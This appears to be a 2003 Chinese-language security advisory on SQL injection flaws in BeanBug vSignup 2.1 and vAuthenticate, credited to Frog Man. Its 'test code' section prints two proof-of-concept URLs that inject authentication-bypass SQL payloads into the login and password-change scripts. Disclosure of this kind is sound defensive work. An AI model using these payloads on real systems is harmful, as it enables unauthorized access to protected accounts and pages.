vSignup远程SQL指令插入漏洞发布时间:2003-01-23 更新时间:2003-01-23 严重程度:低 威胁程度:读取受限文件 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:6606 受影响系统 BeanBug vSignup 2.1详细描述 vAuthenticate及vSignup软件多个脚本实现上存在多个SQL指令可插入漏洞,远程入侵者可以利用这些漏洞来获取受保护的页面,这样可能有助于其进一步攻击系统。 测试代码 http://[target]/chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''=' http://[target]/admin/index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1 解决方案 Frog Man <leseulfrog_at_hotmail.com> 提供了一个非官方的补丁: 相关信息 "Frog Man" <leseulfrog@hotmail.com> vSignup, vAuthenticate (PHP) http://archives.neohapsis.com/archives/bugtraq/2003-01/0159.html |
